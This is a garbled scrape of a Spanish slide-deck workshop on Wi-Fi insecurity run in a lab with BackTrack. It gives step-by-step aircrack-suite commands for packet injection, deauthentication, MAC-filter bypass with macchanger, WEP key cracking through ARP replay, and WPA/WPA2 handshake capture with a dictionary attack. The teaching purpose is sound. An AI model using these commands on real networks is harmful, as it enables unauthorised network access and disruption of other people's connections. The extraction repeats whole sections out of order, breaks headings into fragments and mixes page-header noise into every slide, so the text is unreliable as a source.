httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
